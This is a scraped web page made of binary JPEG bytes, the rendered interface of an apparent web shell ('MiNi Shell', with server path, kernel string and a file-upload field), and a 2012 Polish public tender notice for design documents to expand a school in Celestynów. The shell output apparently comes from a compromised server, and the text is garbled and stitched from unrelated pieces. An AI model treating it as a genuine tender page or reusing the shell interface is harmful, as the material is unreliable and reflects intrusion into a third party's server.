JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121128/477504-N-2012.html

<p class="kh_header"><b>Celestynów: Opracowanie dokumentacji projektowej rozbudowy Szkoły Podstawowej im. Batalionu Zośka w Celestynowie</b><br>
<b>Numer ogłoszenia: 477504 - 2012; data zamieszczenia: 28.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczna Szkoła Podstawowa im. Batalionu "Zośka" , ul. Wrzosowa 42, 05-430 Celestynów, woj. mazowieckie, tel. 22 789 70 22, faks 22 789 70 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spcelestyn.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Plcówka oświatowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej rozbudowy Szkoły Podstawowej im. Batalionu Zośka w Celestynowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest usługa związana z opracowaniem projektu budowlano-wykonawczego rozbudowy budynku Publicznej   Szkoły Podstawowej im. Batalionu Zośka w Celestynowie na podstawie koncepcji stanowiącej Załącznik nr 9 do SIWZ. W ramach zamawiania wykonać należy wielobranżowy projekt budowlano - wykonawczy, który polegać będzie na:
- projektu przebudowy i przystosowania do obowiązujących wymogów oraz norm i przepisów prawa, w tym prawa budowlanego istniejących pomieszczeń szkoły,
- opracowaniu dokumentacji projektowej we wszystkich branżach niezbędnych do prawidłowego wykonania robót budowlanych nowego skrzydła dydaktycznego szkoły,
- opracowaniu dokumentacji projektowej we wszystkich branżach niezbędnych do prawidłowego wykonania robót budowlanych auli kulturalno - rekreacyjnej usytuowanej wewnątrz szkoły,
- opracowaniu dokumentacji projektowej we wszystkich branżach niezbędnych do prawidłowego wykonania robót budowlanych polegających na zagospodarowaniu terenu wokoło szkoły z nowym układem drogowym i pieszym, terenem zabaw dla dzieci, ogrodem z roślinami, powiązania z istniejącym Orlikiem obejmujące infrastrukturę techniczną oraz niezbędne przekładki istniejącego uzbrojenia terenu.
Wykonawca zapewni obsługę geodezyjną prac projektowych ( wykonanie map do celów projektowych, uzyskanie uzgodnień i opinii ZUD) oraz dokumentację geotechniczną.
3.2. Przedmiot zamówienia powinien posiadać wszelkie wymagane prawem uzgodnienia, opinie i sprawdzenia, a także przygotowanie wniosków do uzyskania pozwolenia na budowę i złożenie go w odpowiednim Urzędzie w imieniu Zamawiającego. Projekt powinien zostać wykonany zgodnie z obowiązującymi normami, przepisam, aktualnymi warunkami technicznymi oraz innymi przepisami obowiązującymi w dniu przekazania dokumentacji Zamawiającemu, a w szczególności :
1. - z ustawą z dnia 07 lipca 1994 r. Prawo Budowlane (t.j. Dz. U. z 2006 r., Nr 156 poz. 1118,  z późn. zm.),
2. - z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego ( DZ. U. z 2004 r., Nr 202, poz. 2072 z późn. zm.), 
3. - z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 roku w sprawie określenia metod, podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz.U. z 2004 r., Nr 130, poz. 1389),
4. - z Rozporządzeniem Ministra Transportu Budownictwa i Gospodarki Morskiej z dnia  z dnia 25 kwietnia 2012 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r., Nr 81, poz. 462),
- 	Z ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2004 r. Nr 113, poz. 759 z późn. zm)


- 	z Normami i przepisami obowiązującymi dla przedmiotu opracowania.
Dokumentacja powinna być zgodna z przepisami prawnymi obowiązującymi na dzień wystąpienia pozwolenia na budowę. Wykonawca zobowiązany jest do śledzenia ewentualnych zmian w w/w przepisach i nowo wprowadzanych, oraz stosować je na bieżąco. Usługi obejmujące przedmiot zamówienia  należy wykonywać zgodnie z obowiązującymi przepisami, w tym techniczno-budowlanymi, obowiązującymi normami oraz zasadami wiedzy technicznej.
3.3. 	Przedmiot zamówienia wykonać należy w wersji papierowej w następującym zakresie i ilości: 
a) Projekty budowlane - 6 egzemplarzy; 
b) Projekt wykonawczy - 6 egzemplarzy;
c) Kosztorysy Inwestorskie - 4 egzemplarze;
d) Przedmiary robót - 4 egzemplarze;
e) Specyfikacje Wykonania i Odbioru Robót - 4 egzemplarze;
f) informację dotyczącą bezpieczeństwa i ochrony zdrowia 3 egzemplarze;
g) instrukcję bezpieczeństwa p. poż. - 3 egzemplarze; 
h) Wersja elektroniczna - 4xCD  ( w tym wersja do odczytu i PDF).
3.4. 	Zamawiający zastrzega sobie prawo do powielenia i kopiowania otrzymanych materiałów do celów służbowych i przeprowadzenia postępowania o udzielenie zamówienia publicznego na roboty budowlane. Wykonawca przeniesie wszelkie prawa majątkowe do wykonanej dokumentacji projektowej w zakresie objętym przedmiotem zamówienia. 
3.5. 	Wykonawca zobowiązany będzie do wykonania w ciągu 7 dni aktualizacji kosztorysów inwestorskich w ciągu 2 lat od dnia końcowego odbioru usług na każde wezwanie Zamawiającego.
3.6.	Koszt wszelkich materiałów, podkładów mapowych, aktualizacji dokumentów, innych prac pomocniczych uznanych przez wykonawców za niezbędne do prawidłowej realizacji zamówienia należy ująć w oferowanej cenie.
3.7. 	W ramach zamówienia Wykonawca wykonywać będzie nadzór autorski podczas realizacji robót budowlanych wykonywanych na podstawie niniejszej dokumentacji  projektowej. Nadzór autorski sprawowany będzie zgodnie z przepisami Prawa Budowlanego.  Wykonawca w ramach nadzoru autorskiego ma obowiązek przybycia na budowę na każde wezwanie Zamawiającego przez cały okres realizacji inwestycji. 
3.8. 	Wykonawca obowiązany jest skonsultować założenia techniczne projektów i uzyskać akceptację Zamawiającego przed złożeniem wniosku o pozwolenie na budowę. Na podstawie zaakceptowanych projektów budowlanych Wykonawca wystąpi do właściwego Urzędu  o pozwolenie na budowę.
3.9. 	Wykonawca zobowiązuje się do informowania na bieżąco o prowadzonych postępowaniach formalno-prawnych.
3.10. 	Dokumentacja projektowa powinna zawierać oświadczenia projektanta i sprawdzającego, że została wykonana zgodnie z umową, obowiązującymi w Polsce normami i aktualnymi przepisami techniczno-budowlanymi, że jest kompletna z punktu widzenia celu, któremu ma służyć i nadaje się do realizacji oraz że posiada niezbędne uzgodnienia w zakresie wynikającym z obowiązujących przepisów. 
3.11. 	Zakres prac projektowych niezbędnych do wykonania zadania: 
3.11.1. Prace przedprojektowe
a) szczegółowa inwentaryzacja istniejącej części szkoły
b) badania gruntowe terenu pod inwestycje,
c) uzyskanie mapy do celów projektowych
d) wystąpienie w imieniu Inwestora i uzyskanie Decyzji o warunkach zabudowy
e) wystąpienie do gestorów sieci o nowe przydziały i warunki techniczne przyłączy
- 	energii elektrycznej
- 	wody
- 	kanalizacji sanitarnej i deszczowej
- 	ciepła z sieci zewnętrznej
- 	gazu
f) uzgodnienie nowych wjazdów na działkę i bilansu miejsc parkingowych
g) uzyskać wszelkie uzgodnienia i decyzje wynikające z zakresu projektowania, które będą niezbędne do uzyskania w odpowiednim Urzędzie pozwolenia na budowę zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, z późn. zmianami . 
3.11.2. Prace projektowe
1. Projekt budowlany, architektoniczny (do uzyskania pozwolenia na budowę):
2. Projekt wykonawczy
a) architektoniczny:
projekt zagospodarowania terenu w granicach opracowania
opis techniczny i rozwiązania funkcjonalno-przestrzenne,
rysunki rzutów w skali 1:50,
rysunki przekrojów w miejscach charakterystycznych w skali 1:50,
rysunki elewacji
rysunki aranżacji pomieszczeń w skali 1:50 i 1:20,
kłady ścian w wybranych pomieszczeniach z rozmieszczeniem urządzeń i wyposażenia ruchomego, z doborem kolorystyki ścian,
opis wykończenia i wystroju wnętrz,
detale i szczegóły rozwiązań wybranych elementów,
b) konstrukcyjny
opis, obliczenia statyczno-wytrzymałościowe, część rysunkowa 
przebudowy istniejącej części
budowy nowego skrzydła szkoły
budowy auli rekreacyjno-kulturalnej
c) branży sanitarnej:
instalacje wod-kan ( w połączeniu z istniejącą instalacją w szkole )
opis i część rysunkowa,
obliczenia zapotrzebowania wody i bilans ścieków dla rozbudowywanych toalet
wody zimnej,
ciepłej wody użytkowej i cyrkulacji
kanalizacji sanitarnej
kanalizacji technicznej
kanalizacji deszczowej
hydrantów wewnętrznych
wentylacji mechanicznej 
opis i część rysunkowa
opis określający dostateczną ilość wymian powietrza,
rozwiązanie poszczególnych zespołów wentylacji mechanicznej nawiewno - wywiewnej
schemat i rozwiązania nawiewu pożarowego dla poszczególnych obszarów obiektu
rozwiązanie oddymiania poszczególnych obszarów 
rozwiązanie central wentylacyjnych
ochrona akustyczna systemów
zapewnienie systemu automatycznego sterowania i regulacji pracy urządzeń wentylacji,
instalacji centralnego ogrzewania 
opis i część rysunkowa
schemat instalacji c.o.
projekt włączenia nowych grzejników w system c.o. z nowym bilansem ciepła,
projekt przebudowy węzła cieplnego
sieci zewnętrznych
projekt przebudowy istniejącej kanalizacji deszczowej w granicach projektowanej rozbudowy
ewentualny projekt przebudowy sieci cieplnej ( po wykonaniu nowego bilansu zapotrzebowania)
d) branży elektrycznej i teletechnicznej:
opis i część rysunkowa,
schematy układów instalacji i tablic zasilających,
bilans mocy,
dobór zabezpieczeń i przewodów zasilających,
rozwiązanie ochrony przeciwporażeniowej,
sterowanie i automatyka dla wentylacji,
podłączenie urządzeń
instalacja oświetlenia podstawowego i awaryjnego wraz z obliczeniami natężenia światła dla wszystkich pomieszczeń,
instalacja gniazd wtykowych podstawowych i gwarantowanych,
instalacja uziemienia i połączeń wyrównawczych,
instalacja komputerowa,
instalacja telefoniczna,
e) specyfikacje techniczne wykonania i odbioru robót,
f) wytyczne BIOZ,
g) przedmiary robót,
h) kosztorys inwestorski.
i) opracowanie programu rzeczowo-finansowego etapowania inwestycji
3.12. Przedmiot zamówienia winien objąć wszystkie opisane wyżej elementy wraz z uprzednią oceną stanu istniejącego. Zakres prac objętych przedmiotem zamówienia winien być zgodny z przepisami prawnymi i normami związanymi z ich realizacją , 
3.13. Zamawiający oświadcza, iż posiada prawo do dysponowania nieruchomością na cele budowlane. 
3.14. Wszelkie użyte w w/w koncepcji urządzenia i materiały należy traktować jako przykładowe.  
W projekcie należy przyjąć rozwiązania technologiczne i materiałowe uzgodnione z Zamawiającym, bez wskazywania numerów katalogowych, symboli czy nazw własnych konkretnych producentów urządzeń  / materiałów /elementów itp., a jeżeli jest to niemożliwe -należy wskazać kluczowe parametry techniczne, użytkowe, jak i estetyczne, jakie są wymagane w celu prawidłowej realizacji projektu. 
3.15. Wykonawca po zakończeniu wykonania przedmiotu umowy przedłoży Zamawiającemu kompletną pod względem formalnym, prawnym i praktycznym - dokumentację niezbędną do wystąpienia przez Wykonawcę w imieniu Zamawiającego o pozwolenie na budowę.
3.16. Zamawiający zaleca dokonanie wizji przed przystąpieniem do przygotowania oferty!!!

Zamawiający zastrzega, że umowa z Wykonawcą zostanie podpisana w przypadku przesunięcia środków na przyszły rok budżetowy, po podjęciu stosownej Uchwały przez Rade Gminy Celestynów. W przypadku nie podjęcia przez Radę Gminy Celestynów uchwały o przesunięciu środków przeznaczonych na realizację przedmiotu zamówienia na rok 2013  postępowanie zostanie unieważnione..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>2.1. Zamawiający przewiduje zamówienia uzupełniające stanowiące nie więcej niż 50% wartości zamówienia podstawowego o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych.
2.2. Przedmiot zamówień uzupełniających będzie polegał na powtórzeniu usług będących przedmiotem niniejszego zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.22.00.00-6, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każda składana oferta musi być zabezpieczona wadium w wysokości: 5.000,00 zł (słownie: pięć tysięcy złotych) ważnym w okresie związania ofertą. 
8.2. 	Wadium może zostać wniesione zgodnie z zapisami art. 45 ust 6 Pzp. 
8.3. 	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, a dowód wniesienia wadium (kserokopia poświadczona za zgodność z oryginałem) powinien załączyć do oferty wraz z informacją, na jaki numer konta należy zwrócić wadium - w przypadku wniesienia wadium w formie pieniężnej .
8.4. 	Wadium wnoszone w innej formie niż pieniądz, musi posiadać ważność co najmniej do końca terminu związania Wykonawcy, złożoną przez niego ofertą (tj. 30 dni). Wniesienie wadium o krótszym terminie ważności skutkować będzie wykluczeniem Wykonawcy z niniejszego postępowania.
8.5. 	Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy o numerze:                      09 8001 0005 2002 0010 9820 0006 , prowadzone przez: Bank Spółdzielczy w Otwocku Oddział w Celestynowie, z następującą adnotacją: Opracowanie dokumentacji projektowej rozbudowy Szkoły Podstawowej im. Batalionu Zośka w Celestynowie.
8.6. 	Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania wpłaty na rachunku bankowym Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.1 Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.1. ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę, że należycie wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 usługi polegające na wykonaniu  dokumentacji projektowej obejmującej swym zakresem budowę lub rozbudowę budynku użyteczności publicznej, każda z podaniem dat wykonania i odbiorców oraz załączeniem dokumentów (np. referencje, bezusterkowe protokoły odbioru) potwierdzających, że usługi te zostały wykonane należycie.,
	W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć Wykaz wykonanych usług sporządzony według wzoru stanowiącego Załącznik nr 5 do SIWZ  oraz załączyć do oferty  dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje, bezusterkowe protokoły odbioru).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.1. ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę że  dysponuje lub będzie dysponował w czasie realizacji zamówienia: 
- minimum jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w zakresie specjalności konstrukcyjno-budowlanej, 
- minimum jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w zakresie specjalności architektonicznej, 
- minimum jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w zakresie specjalności telekomunikacyjnej, 
- minimum jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w zakresie specjalności  sanitarnej lub inżynieryjno-instalacyjnej obejmującej: instalacje i urządzenia cieplne, instalacje i urządzenia wodne i kanalizacyjne, instalacje i urządzenia wentylacyjne, instalacje i urządzenia gazowe,
- minimum jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w zakresie specjalności  instalacyjnej w zakresie  sieci instalacji i urządzeń  elektrycznych i elektroenergetycznych.
W celu potwierdzenia spełniania powyższego warunku Wykonawca zobowiązany jest przedłożyć Wykaz osób  sporządzony według wzoru stanowiącego Załącznik nr 6 do SIWZ.
Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę  posiadania opłaconej  polisy  lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. Polisa lub inny dokument świadczący o posiadaniu przez Wykonawcę ubezpieczenia powinny być ważne w dniu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
